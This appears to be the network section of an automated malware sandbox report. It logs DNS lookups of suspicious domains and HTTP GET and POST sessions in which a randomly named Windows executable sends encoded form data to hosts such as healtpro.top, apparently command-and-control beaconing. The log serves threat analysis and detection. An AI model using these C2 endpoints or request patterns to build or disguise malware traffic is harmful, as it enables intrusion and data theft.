                        Oct 10, 2024 10:08:49.703030109 CEST8050008104.21.11.31192.168.2.4
                        Oct 10, 2024 10:08:49.703171968 CEST5000880192.168.2.4104.21.11.31
                        Oct 10, 2024 10:08:49.723216057 CEST5000880192.168.2.4104.21.11.31
                        Oct 10, 2024 10:08:49.728178024 CEST8050008104.21.11.31192.168.2.4
                        Oct 10, 2024 10:08:50.708673000 CEST8050008104.21.11.31192.168.2.4
                        Oct 10, 2024 10:08:50.708858013 CEST8050008104.21.11.31192.168.2.4
                        Oct 10, 2024 10:08:50.708965063 CEST8050008104.21.11.31192.168.2.4
                        Oct 10, 2024 10:08:50.709021091 CEST5000880192.168.2.4104.21.11.31
                        Oct 10, 2024 10:08:50.709055901 CEST5000880192.168.2.4104.21.11.31
                        Oct 10, 2024 10:08:51.235109091 CEST5000880192.168.2.4104.21.11.31
                        Oct 10, 2024 10:08:52.254441977 CEST5000980192.168.2.4104.21.11.31
                        Oct 10, 2024 10:08:52.259294987 CEST8050009104.21.11.31192.168.2.4
                        Oct 10, 2024 10:08:52.259377956 CEST5000980192.168.2.4104.21.11.31
                        Oct 10, 2024 10:08:52.270755053 CEST5000980192.168.2.4104.21.11.31
                        Oct 10, 2024 10:08:52.275716066 CEST8050009104.21.11.31192.168.2.4
                        Oct 10, 2024 10:08:52.275724888 CEST8050009104.21.11.31192.168.2.4
                        Oct 10, 2024 10:08:52.275732994 CEST8050009104.21.11.31192.168.2.4
                        Oct 10, 2024 10:08:52.275742054 CEST8050009104.21.11.31192.168.2.4
                        Oct 10, 2024 10:08:52.275811911 CEST8050009104.21.11.31192.168.2.4
                        Oct 10, 2024 10:08:52.275821924 CEST8050009104.21.11.31192.168.2.4
                        Oct 10, 2024 10:08:52.275876999 CEST8050009104.21.11.31192.168.2.4
                        Oct 10, 2024 10:08:52.275885105 CEST8050009104.21.11.31192.168.2.4
                        Oct 10, 2024 10:08:52.275893927 CEST8050009104.21.11.31192.168.2.4
                        Oct 10, 2024 10:08:53.309482098 CEST8050009104.21.11.31192.168.2.4
                        Oct 10, 2024 10:08:53.310473919 CEST8050009104.21.11.31192.168.2.4
                        Oct 10, 2024 10:08:53.310542107 CEST5000980192.168.2.4104.21.11.31
                        Oct 10, 2024 10:08:53.781913996 CEST5000980192.168.2.4104.21.11.31
                        Oct 10, 2024 10:08:54.800589085 CEST5001080192.168.2.4104.21.11.31
                        Oct 10, 2024 10:08:54.805644989 CEST8050010104.21.11.31192.168.2.4
                        Oct 10, 2024 10:08:54.805737019 CEST5001080192.168.2.4104.21.11.31
                        Oct 10, 2024 10:08:54.815498114 CEST5001080192.168.2.4104.21.11.31
                        Oct 10, 2024 10:08:54.820310116 CEST8050010104.21.11.31192.168.2.4
                        Oct 10, 2024 10:08:55.805896044 CEST8050010104.21.11.31192.168.2.4
                        Oct 10, 2024 10:08:55.807231903 CEST8050010104.21.11.31192.168.2.4
                        Oct 10, 2024 10:08:55.807280064 CEST5001080192.168.2.4104.21.11.31
                        Oct 10, 2024 10:08:55.808629036 CEST5001080192.168.2.4104.21.11.31
                        Oct 10, 2024 10:08:55.813419104 CEST8050010104.21.11.31192.168.2.4
                        Oct 10, 2024 10:09:01.013219118 CEST5001180192.168.2.4154.23.184.240
                        Oct 10, 2024 10:09:01.018165112 CEST8050011154.23.184.240192.168.2.4
                        Oct 10, 2024 10:09:01.018393993 CEST5001180192.168.2.4154.23.184.240
                        Oct 10, 2024 10:09:01.032438993 CEST5001180192.168.2.4154.23.184.240
                        Oct 10, 2024 10:09:01.037766933 CEST8050011154.23.184.240192.168.2.4
                        Oct 10, 2024 10:09:01.906585932 CEST8050011154.23.184.240192.168.2.4
                        Oct 10, 2024 10:09:01.906620979 CEST8050011154.23.184.240192.168.2.4
                        Oct 10, 2024 10:09:01.906667948 CEST5001180192.168.2.4154.23.184.240
                        Oct 10, 2024 10:09:02.859991074 CEST5001180192.168.2.4154.23.184.240

                        UDP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Oct 10, 2024 10:08:12.672231913 CEST5485453192.168.2.41.1.1.1
                        Oct 10, 2024 10:08:12.682164907 CEST53548541.1.1.1192.168.2.4
                        Oct 10, 2024 10:08:17.702220917 CEST5025253192.168.2.41.1.1.1
                        Oct 10, 2024 10:08:17.777334929 CEST53502521.1.1.1192.168.2.4
                        Oct 10, 2024 10:08:33.537013054 CEST6205753192.168.2.41.1.1.1
                        Oct 10, 2024 10:08:33.842825890 CEST53620571.1.1.1192.168.2.4
                        Oct 10, 2024 10:08:47.130570889 CEST6155653192.168.2.41.1.1.1
                        Oct 10, 2024 10:08:47.150105000 CEST53615561.1.1.1192.168.2.4
                        Oct 10, 2024 10:09:00.825719118 CEST5409253192.168.2.41.1.1.1
                        Oct 10, 2024 10:09:01.010266066 CEST53540921.1.1.1192.168.2.4

                        DNS Queries

                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                        Oct 10, 2024 10:08:12.672231913 CEST192.168.2.41.1.1.10x9a5eStandard query (0)www.bonusgame2024.onlineA (IP address)IN (0x0001)false
                        Oct 10, 2024 10:08:17.702220917 CEST192.168.2.41.1.1.10x81a7Standard query (0)www.chalet-tofane.netA (IP address)IN (0x0001)false
                        Oct 10, 2024 10:08:33.537013054 CEST192.168.2.41.1.1.10xfdd3Standard query (0)www.healtpro.topA (IP address)IN (0x0001)false
                        Oct 10, 2024 10:08:47.130570889 CEST192.168.2.41.1.1.10x25Standard query (0)www.b5x7vk.agencyA (IP address)IN (0x0001)false
                        Oct 10, 2024 10:09:00.825719118 CEST192.168.2.41.1.1.10x973bStandard query (0)www.wcq24.topA (IP address)IN (0x0001)false

                        DNS Answers

                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                        Oct 10, 2024 10:08:12.682164907 CEST1.1.1.1192.168.2.40x9a5eName error (3)www.bonusgame2024.onlinenonenoneA (IP address)IN (0x0001)false
                        Oct 10, 2024 10:08:17.777334929 CEST1.1.1.1192.168.2.40x81a7No error (0)www.chalet-tofane.netchalet-tofane.netCNAME (Canonical name)IN (0x0001)false
                        Oct 10, 2024 10:08:17.777334929 CEST1.1.1.1192.168.2.40x81a7No error (0)chalet-tofane.net62.149.128.40A (IP address)IN (0x0001)false
                        Oct 10, 2024 10:08:33.842825890 CEST1.1.1.1192.168.2.40xfdd3No error (0)www.healtpro.top203.161.43.245A (IP address)IN (0x0001)false
                        Oct 10, 2024 10:08:47.150105000 CEST1.1.1.1192.168.2.40x25No error (0)www.b5x7vk.agency104.21.11.31A (IP address)IN (0x0001)false
                        Oct 10, 2024 10:08:47.150105000 CEST1.1.1.1192.168.2.40x25No error (0)www.b5x7vk.agency172.67.165.25A (IP address)IN (0x0001)false
                        Oct 10, 2024 10:09:01.010266066 CEST1.1.1.1192.168.2.40x973bNo error (0)www.wcq24.topwcq24.topCNAME (Canonical name)IN (0x0001)false
                        Oct 10, 2024 10:09:01.010266066 CEST1.1.1.1192.168.2.40x973bNo error (0)wcq24.top154.23.184.240A (IP address)IN (0x0001)false

                        HTTP Request Dependency Graph

                        • www.chalet-tofane.net
                        • www.healtpro.top
                        • www.b5x7vk.agency
                        • www.wcq24.top

                        HTTP Packets

                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.44990762.149.128.40802088C:\Program Files (x86)\XLTCSewxDUMLdikaPXcOZYCoqtmGBvvhnUXiYckHGzcCnXzSTMhVbViDzubQxfnbEGSspn\eYlgnnKYnAjqSS.exe
                        TimestampBytes transferredDirectionData
                        Oct 10, 2024 10:08:17.851444006 CEST503OUTGET /w5h3/?xNv=1SmCwmpOaIYJfuspvbmYENxQiVuKofAafkRqArhwQnoekPS2kKO+Sw+l3ZpIkD6/zHiqkZCr31NVHRkc0KhHMBZH6coriNZLnk7PgxLNtl8YZG6QQCHD2lU=&xh-d=eNF4ktDXSL5XRvo HTTP/1.1
                        Host: www.chalet-tofane.net
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                        Accept-Language: en-US,en
                        Connection: close
                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_0_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12A405
                        Oct 10, 2024 10:08:18.483115911 CEST1236INHTTP/1.1 404 Not Found
                        Cache-Control: private
                        Content-Type: text/html; charset=utf-8
                        Server: Microsoft-IIS/10.0
                        X-Powered-By: ASP.NET
                        Date: Thu, 10 Oct 2024 08:08:18 GMT
                        Connection: close
                        Content-Length: 5103
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 [TRUNCATED]
                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0 [TRUNCATED]
                        Oct 10, 2024 10:08:18.483144999 CEST1236INData Raw: 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e
                        Data Ascii: r:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;color:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5
                        Oct 10, 2024 10:08:18.483169079 CEST1236INData Raw: 3a 69 74 61 6c 69 63 3b 7d 20 0a 2e 63 6c 65 61 72 7b 63 6c 65 61 72 3a 62 6f 74 68 3b 7d 20 0a 2e 70 72 65 66 65 72 72 65 64 7b 70 61 64 64 69 6e 67 3a 30 20 35 70 78 20 32 70 78 20 35 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61
                        Data Ascii: :italic;} .clear{clear:both;} .preferred{padding:0 5px 2px 5px;font-weight:normal;background:#006633;color:#FFF;font-size:.8em;} --> </style> </head> <body> <div id="content"> <div class="content-container"> <h3>HTTP Error 404.0 -
                        Oct 10, 2024 10:08:18.483185053 CEST1236INData Raw: 6d 61 74 69 6f 6e 3a 3c 2f 68 34 3e 20 0a 20 20 3c 64 69 76 20 69 64 3d 22 64 65 74 61 69 6c 73 2d 6c 65 66 74 22 3e 20 0a 20 20 20 3c 74 61 62 6c 65 20 62 6f 72 64 65 72 3d 22 30 22 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 22 30 22 20 63 65 6c 6c
                        Data Ascii: mation:</h4> <div id="details-left"> <table border="0" cellpadding="0" cellspacing="0"> <tr class="alt"><th>Module</th><td>&nbsp;&nbsp;&nbsp;IIS Web Core</td></tr> <tr><th>Notification</th><td>&nbsp;&nbsp;&nbsp;MapRequestHandl
                        Oct 10, 2024 10:08:18.483198881 CEST378INData Raw: 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 20 0a 20 3c 66 69 65 6c 64 73 65 74 3e 3c 68 34 3e 4d 6f 72 65 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 3a 3c 2f 68 34 3e 20 0a 20 20 54 68 69 73 20 65 72 72 6f 72 20 6d 65 61 6e 73 20 74 68 61 74 20 74 68 65
                        Data Ascii: nt-container"> <fieldset><h4>More Information:</h4> This error means that the file or directory does not exist on the server. Create the file or directory and try the request again. <p><a href="https://go.microsoft.com/fwlink/?LinkID=6


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        1192.168.2.450003203.161.43.245802088C:\Program Files (x86)\XLTCSewxDUMLdikaPXcOZYCoqtmGBvvhnUXiYckHGzcCnXzSTMhVbViDzubQxfnbEGSspn\eYlgnnKYnAjqSS.exe
                        TimestampBytes transferredDirectionData
                        Oct 10, 2024 10:08:33.865459919 CEST754OUTPOST /fes8/ HTTP/1.1
                        Host: www.healtpro.top
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                        Accept-Encoding: gzip, deflate
                        Accept-Language: en-US,en
                        Origin: http://www.healtpro.top
                        Content-Length: 200
                        Connection: close
                        Cache-Control: max-age=0
                        Content-Type: application/x-www-form-urlencoded
                        Referer: http://www.healtpro.top/fes8/
                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_0_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12A405
                        Data Raw: 78 4e 76 3d 52 52 6e 73 75 52 71 51 37 49 48 42 55 4e 52 37 33 5a 71 65 74 53 7a 43 61 44 70 35 4a 4f 64 4a 37 71 58 56 4b 67 70 4d 33 6b 45 73 68 6f 70 7a 62 50 2f 50 55 52 51 30 78 2b 59 30 79 54 6d 74 69 48 73 72 61 70 4e 6b 7a 74 66 66 74 69 68 4b 55 67 68 6b 4f 53 70 39 58 5a 59 56 37 39 4d 6a 65 4b 6b 42 2b 6c 72 57 54 30 57 75 62 51 5a 63 57 64 2b 77 4b 67 72 53 6d 39 49 6c 41 4d 48 30 46 4e 61 69 5a 72 50 72 6f 50 42 63 74 41 58 50 69 4e 46 72 4f 33 50 55 44 64 78 44 56 6c 33 50 2f 65 39 66 68 6f 4d 44 36 38 2b 79 77 43 4f 47 79 63 76 50 4d 39 4b 32 59 32 49 50 47 7a 4d 79 48 67 3d 3d
                        Data Ascii: xNv=RRnsuRqQ7IHBUNR73ZqetSzCaDp5JOdJ7qXVKgpM3kEshopzbP/PURQ0x+Y0yTmtiHsrapNkztfftihKUghkOSp9XZYV79MjeKkB+lrWT0WubQZcWd+wKgrSm9IlAMH0FNaiZrProPBctAXPiNFrO3PUDdxDVl3P/e9fhoMD68+ywCOGycvPM9K2Y2IPGzMyHg==
                        Oct 10, 2024 10:08:34.440344095 CEST595INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Oct 2024 08:08:34 GMT
                        Server: Apache
                        X-Frame-Options: SAMEORIGIN
                        Content-Length: 389
                        X-XSS-Protection: 1; mode=block
                        Connection: close
                        Content-Type: text/html
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        2192.168.2.450004203.161.43.245802088C:\Program Files (x86)\XLTCSewxDUMLdikaPXcOZYCoqtmGBvvhnUXiYckHGzcCnXzSTMhVbViDzubQxfnbEGSspn\eYlgnnKYnAjqSS.exe
                        TimestampBytes transferredDirectionData
                        Oct 10, 2024 10:08:36.412528038 CEST774OUTPOST /fes8/ HTTP/1.1
                        Host: www.healtpro.top
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                        Accept-Encoding: gzip, deflate
                        Accept-Language: en-US,en
                        Origin: http://www.healtpro.top
                        Content-Length: 220
                        Connection: close
                        Cache-Control: max-age=0
                        Content-Type: application/x-www-form-urlencoded
                        Referer: http://www.healtpro.top/fes8/
                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_0_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12A405
                        Data Raw: 78 4e 76 3d 52 52 6e 73 75 52 71 51 37 49 48 42 57 75 35 37 6b 6f 71 65 6c 53 7a 42 45 54 70 35 48 65 63 68 37 71 72 56 4b 68 74 63 33 57 67 73 68 4a 5a 7a 61 4c 4c 50 52 52 51 30 70 75 5a 2f 39 7a 6d 79 69 48 67 5a 61 6f 78 6b 7a 70 33 66 74 6e 46 4b 56 58 56 6c 4f 43 70 37 59 35 59 54 32 64 4d 6a 65 4b 6b 42 2b 68 4b 42 54 77 36 75 61 67 70 63 57 38 2b 78 55 77 72 52 68 39 49 6c 4e 73 48 4b 46 4e 62 33 5a 71 6a 52 6f 4e 35 63 74 46 37 50 68 59 78 6f 55 6e 50 53 4d 39 77 2f 55 30 57 43 36 65 4d 74 69 4b 74 6a 39 50 61 79 78 45 66 63 6a 74 4f 59 65 39 75 46 46 78 42 37 4c 77 78 37 63 6b 32 74 50 41 59 58 71 70 70 68 62 7a 72 57 65 57 2f 6f 47 59 77 3d
                        Data Ascii: xNv=RRnsuRqQ7IHBWu57koqelSzBETp5Hech7qrVKhtc3WgshJZzaLLPRRQ0puZ/9zmyiHgZaoxkzp3ftnFKVXVlOCp7Y5YT2dMjeKkB+hKBTw6uagpcW8+xUwrRh9IlNsHKFNb3ZqjRoN5ctF7PhYxoUnPSM9w/U0WC6eMtiKtj9PayxEfcjtOYe9uFFxB7Lwx7ck2tPAYXqpphbzrWeW/oGYw=
                        Oct 10, 2024 10:08:37.020725012 CEST595INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Oct 2024 08:08:36 GMT
                        Server: Apache
                        X-Frame-Options: SAMEORIGIN
                        Content-Length: 389
                        X-XSS-Protection: 1; mode=block
                        Connection: close
                        Content-Type: text/html
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        3192.168.2.450005203.161.43.245802088C:\Program Files (x86)\XLTCSewxDUMLdikaPXcOZYCoqtmGBvvhnUXiYckHGzcCnXzSTMhVbViDzubQxfnbEGSspn\eYlgnnKYnAjqSS.exe
                        TimestampBytes transferredDirectionData
                        Oct 10, 2024 10:08:38.959624052 CEST10856OUTPOST /fes8/ HTTP/1.1
                        Host: www.healtpro.top
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                        Accept-Encoding: gzip, deflate
                        Accept-Language: en-US,en
                        Origin: http://www.healtpro.top
                        Content-Length: 10300
                        Connection: close
                        Cache-Control: max-age=0
                        Content-Type: application/x-www-form-urlencoded
                        Referer: http://www.healtpro.top/fes8/
                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_0_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12A405
                        Data Raw: 78 4e 76 3d 52 52 6e 73 75 52 71 51 37 49 48 42 57 75 35 37 6b 6f 71 65 6c 53 7a 42 45 54 70 35 48 65 63 68 37 71 72 56 4b 68 74 63 33 57 6f 73 68 66 46 7a 61 73 58 50 53 52 51 30 33 2b 59 34 39 7a 6e 6f 69 48 6f 64 61 6f 38 5a 7a 76 7a 66 74 42 5a 4b 41 56 39 6c 41 43 70 37 54 5a 59 53 37 39 4d 79 65 4c 49 46 2b 6c 6d 42 54 77 36 75 61 69 68 63 51 74 2b 78 57 77 72 53 6d 39 49 58 41 4d 47 6e 46 4e 53 41 5a 71 57 75 6f 65 78 63 74 68 62 50 6a 75 64 6f 4d 33 50 51 50 39 77 6e 55 30 62 43 36 65 68 55 69 4f 6b 30 39 4d 47 79 79 52 2b 6a 2f 4a 4f 63 64 63 75 67 52 7a 31 62 46 69 5a 49 46 45 36 57 63 46 34 49 71 35 5a 69 51 45 47 70 43 54 72 55 52 2f 79 65 71 48 62 44 67 63 50 35 58 39 4b 31 55 54 51 43 4c 67 76 50 48 68 4e 79 48 50 64 5a 47 4d 4b 53 59 49 4c 41 31 68 6c 6d 5a 33 48 66 59 4d 52 79 67 4c 72 36 61 61 42 44 56 78 68 71 62 74 69 36 58 55 50 57 37 6c 49 74 4f 70 64 73 6b 45 44 58 79 33 76 58 70 47 6a 43 55 74 79 47 52 7a 7a 33 6a 73 68 33 78 78 66 5a 52 7a 73 4b 7a 79 61 4e 4e 54 61 59 39 42 [TRUNCATED]
                        Data Ascii: xNv=RRnsuRqQ7IHBWu57koqelSzBETp5Hech7qrVKhtc3WoshfFzasXPSRQ03+Y49znoiHodao8ZzvzftBZKAV9lACp7TZYS79MyeLIF+lmBTw6uaihcQt+xWwrSm9IXAMGnFNSAZqWuoexcthbPjudoM3PQP9wnU0bC6ehUiOk09MGyyR+j/JOcdcugRz1bFiZIFE6WcF4Iq5ZiQEGpCTrUR/yeqHbDgcP5X9K1UTQCLgvPHhNyHPdZGMKSYILA1hlmZ3HfYMRygLr6aaBDVxhqbti6XUPW7lItOpdskEDXy3vXpGjCUtyGRzz3jsh3xxfZRzsKzyaNNTaY9BSn0W5YcqfRwJ1Evlbq/6+8bLnc32gYwNuBc4+Y5x4VW5xCfTZ+KJgot9q5TM0Jt0ytbGVAf4eER0fH1C9Gqz0SuqHBXwOXATm5pZ2HuhO3kzXn2sIiavQ9I4s3KmQrz4g/+6U8qQLqlFEAeB+eCpaXoF8L3WI6gk5vzkwTLkj8ZVSRE2u7tyogibvVgMFEt5QsOB2u3wiRzyElW/szzLnJv61hgDKFgTlRrj0w+Gq6Gis3NbUm+F0/UpFrnRVouXCCnczwZxPfjxqN0Cr1YaJBs7vNi/PowLkhygVp5/LzTup0Yn+ViUwfW5Hf6+jxaNoUuvbqDlyESncpBqKqekIutbG9i4z+sShpmjnV1Sg4zeHSyGls/wi74wSBE+nF/Y2A4j6/w3XKU8NOTv7djzQ87GaVdLPZIumi2Jtf2BU7Fz2r0d7EiN29NJgeZl47sAXCKcpLJ3u9Gb5xG1yN9I9NhVCAk0TtVu+iaOmt3Ynd149VmIaZde9R+Ydh6l8WRu4ar1BYcw9aq+5BNbKNFGD5yRXPEvku+8zszedDfa8OBvPCrkPPvb1vQMdNyR7gD1xDzthnMACmGODk8fOyYNicq/cU6/aNeGUor3r0w6ui1Z9rPEBvItGeYvdUlhzw6CBURorohp10b4cNtxFoivHZxOG7HmDikEG/ [TRUNCATED]
                        Oct 10, 2024 10:08:39.615544081 CEST595INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Oct 2024 08:08:39 GMT
                        Server: Apache
                        X-Frame-Options: SAMEORIGIN
                        Content-Length: 389
                        X-XSS-Protection: 1; mode=block
                        Connection: close
                        Content-Type: text/html
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 